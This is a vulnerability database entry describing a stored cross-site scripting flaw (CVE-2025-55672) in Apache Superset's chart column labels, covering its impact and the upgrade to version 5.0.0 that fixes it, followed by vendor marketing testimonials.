Cloud Vulnerability DB
A community-led vulnerabilities database
Vulnerability DatabaseCVE-2025-55672
CVE-2025-55672:
Apache Superset vulnerability analysis and mitigation
Overview
A stored Cross-Site Scripting (XSS) vulnerability (CVE-2025-55672) was discovered in Apache Superset's chart visualization feature affecting versions before 5.0.0. The vulnerability was disclosed on August 14, 2025, by Daniel Gaspar (OSS Security).
Technical details
The vulnerability exists in Apache Superset's chart visualization where an authenticated user with chart editing permissions can inject malicious payloads into column labels. The payload is not properly sanitized and gets executed in the victim's browser when hovering over the chart. This could potentially lead to session hijacking or arbitrary command execution on behalf of the user (OSS Security).
Impact
When exploited, the vulnerability allows attackers to execute arbitrary JavaScript code in the victim's browser when they hover over affected charts. This can result in session hijacking or execution of arbitrary commands with the victim's privileges (OSS Security).
Mitigation and workarounds
Users are recommended to upgrade to Apache Superset version 5.0.0, which contains the fix for this vulnerability (OSS Security).
Additional resources
Source: This report was generated using AI
Free Vulnerability Assessment
Benchmark your Cloud Security Posture
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Additional Wiz resources
Get a personalized demo
Ready to see Wiz in action?
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management